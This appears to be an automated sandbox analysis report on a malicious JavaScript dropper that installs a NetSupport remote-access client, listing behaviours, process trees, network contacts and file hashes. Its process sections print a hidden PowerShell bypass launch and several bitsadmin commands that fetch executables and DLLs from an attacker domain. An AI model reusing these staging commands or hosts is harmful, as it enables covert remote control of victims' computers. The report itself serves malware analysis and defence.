Analysis Overview
SHA256
2b04eb3c0f95ecd1e2a5b74275d82ce3d92f8b153774a59fb7243d39b1b56ae9
Threat Level: Known bad
The file ave6608jsjsjsjsjsjsjsjsjs.js was found to be: Known bad.
Malicious Activity Summary
NetSupport
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Drops file in System32 directory
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Download via BitsAdmin
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-09 19:19
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2023-07-09 19:19
Reported
2023-07-09 19:23
Platform
win10v2004-20230703-en
Max time kernel
162s
Max time network
177s
Command Line
Signatures
NetSupport
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{EE35E43B-4C55-4094-8443-1411A2B5CF9F}.catalogItem | C:\Windows\System32\svchost.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\svchost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\System32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\svchost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1584 wrote to memory of 1656 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1584 wrote to memory of 1656 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1656 wrote to memory of 4732 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe |
| PID 1656 wrote to memory of 4732 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe |
| PID 1656 wrote to memory of 4732 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe |
Uses Task Scheduler COM API
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\rakg3z3.ps1
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
"C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | virvatulishop.com | udp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.245.44.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deperekanuki1.com | udp |
| RU | 5.42.74.53:5222 | deperekanuki1.com | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp |
| GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp |
| GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 53.74.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.138.172.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.150.241.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.148.119.40.in-addr.arpa | udp |
Files
memory/1656-137-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
memory/1656-138-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
memory/1656-141-0x0000026C59F20000-0x0000026C59F42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1e5lhyvm.ylq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\rakg3z3.ps1
| MD5 | 3aca9681a54650494d37d91440ea8a78 |
| SHA1 | eda71218ed383e77a09058002bb0d1ea693a84cf |
| SHA256 | 6f606c666e1fac66c4057174ec83c76d635ea80c7354cc3f3d0871efc8f9a43b |
| SHA512 | 9eba188889a4b1f1dd521d50bf529fe6db4d060ca986d443df6fdb12b79d3c6b2bd63aa4791e441722376b5c2fdebd13cd5c389eb4445da35e3e8a5597fa7d6c |
memory/1656-150-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
memory/1656-151-0x0000026C5C480000-0x0000026C5C494000-memory.dmp
memory/1656-152-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
memory/1656-153-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
memory/1656-154-0x0000026C5C4A0000-0x0000026C5C4B2000-memory.dmp
memory/1656-155-0x0000026C5C470000-0x0000026C5C47A000-memory.dmp
memory/1656-156-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
| MD5 | 45fe5531717cd1b9532cbb6a5daaeb3a |
| SHA1 | cb908e267a08c37d7e184f47f788e82cca38f83e |
| SHA256 | ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9 |
| SHA512 | 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb |
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
| MD5 | 45fe5531717cd1b9532cbb6a5daaeb3a |
| SHA1 | cb908e267a08c37d7e184f47f788e82cca38f83e |
| SHA256 | ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9 |
| SHA512 | 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb |
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
| MD5 | 45fe5531717cd1b9532cbb6a5daaeb3a |
| SHA1 | cb908e267a08c37d7e184f47f788e82cca38f83e |
| SHA256 | ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9 |
| SHA512 | 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb |
C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.dll
| MD5 | 9c9302e75c25c2ba996efd89a1047205 |
| SHA1 | 9e79627ff32d5abd3382b65a509baeb31c78a7f2 |
| SHA256 | beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1 |
| SHA512 | d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1 |
C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.DLL
| MD5 | 9c9302e75c25c2ba996efd89a1047205 |
| SHA1 | 9e79627ff32d5abd3382b65a509baeb31c78a7f2 |
| SHA256 | beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1 |
| SHA512 | d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1 |
C:\Users\Admin\AppData\RoamingOfficeStartup\pcichek.dll
| MD5 | 104b30fef04433a2d2fd1d5f99f179fe |
| SHA1 | ecb08e224a2f2772d1e53675bedc4b2c50485a41 |
| SHA256 | 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd |
| SHA512 | 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f |
C:\Users\Admin\AppData\RoamingOfficeStartup\PCICHEK.DLL
| MD5 | 104b30fef04433a2d2fd1d5f99f179fe |
| SHA1 | ecb08e224a2f2772d1e53675bedc4b2c50485a41 |
| SHA256 | 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd |
| SHA512 | 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f |
C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll
| MD5 | 34dfb87e4200d852d1fb45dc48f93cfc |
| SHA1 | 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641 |
| SHA256 | 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703 |
| SHA512 | f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2 |
C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll
| MD5 | 34dfb87e4200d852d1fb45dc48f93cfc |
| SHA1 | 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641 |
| SHA256 | 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703 |
| SHA512 | f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2 |
C:\Users\Admin\AppData\RoamingOfficeStartup\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
memory/1656-202-0x0000026C5A070000-0x0000026C5A080000-memory.dmp
C:\Users\Admin\AppData\RoamingOfficeStartup\NSM.LIC
| MD5 | b9956282a0fed076ed083892e498ac69 |
| SHA1 | d14a665438385203283030a189ff6c5e7c4bf518 |
| SHA256 | fcc6afd664a8045bd61c398be3c37a97536a199a48d277e11977f93868ae1acc |
| SHA512 | 7daa09113c0e8a36c91cc6d657c65851a20dff6b60ac3d2f40c5737c12c1613c553955f84d131ba2139959973fef9fc616ca5e968cb16c25acf2d4739eed87eb |
C:\Users\Admin\AppData\RoamingOfficeStartup\client32.ini
| MD5 | a252f22f61f960c54fa32ae0de7dd17c |
| SHA1 | 00fe1097e70f1f6307e6bc68f40d49abb01dd2d5 |
| SHA256 | a5be7a73bbed8ec4e1a7819289da5412fe9ddf628941aa3b35fbe7454f148618 |
| SHA512 | 7998e6cd43853b77e38cfedf0b6081c2965c9facb891ebd9a33db0e39b71d683f218174d87f99d5ab22983632c4c319bd63ec9dcbf1cbc81a77e3053ae3f1593 |
C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL
| MD5 | c94005d2dcd2a54e40510344e0bb9435 |
| SHA1 | 55b4a1620c5d0113811242c20bd9870a1e31d542 |
| SHA256 | 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899 |
| SHA512 | 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a |
C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL
| MD5 | c94005d2dcd2a54e40510344e0bb9435 |
| SHA1 | 55b4a1620c5d0113811242c20bd9870a1e31d542 |
| SHA256 | 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899 |
| SHA512 | 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a |
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-09 19:19
Reported
2023-07-09 19:22
Platform
win7-20230705-en
Max time kernel
98s
Max time network
105s
Command Line
Signatures
Enumerates physical storage devices
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\z6ujb7u.ps1
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/NSM.LIC C:\Users\Admin\AppData\RoamingOfficeStartupNSM.LIC
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/pcicapi.dll C:\Users\Admin\AppData\RoamingOfficeStartuppcicapi.dll
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICHEK.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICHEK.DLL
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICL32.DLL
C:\Windows\system32\bitsadmin.exe
"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/remcmdstub.exe C:\Users\Admin\AppData\RoamingOfficeStartupremcmdstub.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | virvatulishop.com | udp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
| FI | 5.44.245.24:443 | virvatulishop.com | tcp |
Files
memory/3000-60-0x000000001B260000-0x000000001B542000-memory.dmp
memory/3000-61-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/3000-62-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/3000-63-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/3000-64-0x00000000024E0000-0x0000000002560000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\z6ujb7u.ps1
| MD5 | d8d4beafe295f925cf1e7c73667b99cb |
| SHA1 | dc73efce5921033d72bbb09713b347f0e5b6358f |
| SHA256 | 82d78c24842eda98e42ff73b25fd97dd52ed9046c4c5e5200bb2ad760c18f9c3 |
| SHA512 | dfe68905caed73d5d61090598bab5db93e432098e37bf815243b7c031fd4403c3a1fbeab314edc22f466a22de521f8a2fa5bbf27356a958aafd56f2fa9feef21 |
memory/3000-66-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/3000-67-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/3000-68-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/3000-69-0x00000000024E0000-0x0000000002560000-memory.dmp